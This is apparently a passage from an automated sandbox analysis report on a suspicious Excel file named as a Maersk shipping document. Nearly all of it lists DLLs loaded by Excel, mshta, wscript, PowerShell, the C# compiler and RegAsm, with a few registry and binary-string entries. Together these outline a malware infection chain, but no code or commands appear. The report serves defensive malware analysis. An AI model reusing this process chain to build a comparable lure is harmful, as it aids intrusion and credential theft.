                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: Maersk BL, IN & PL.xlsStatic file information: File size 1094656 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.pdb source: powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
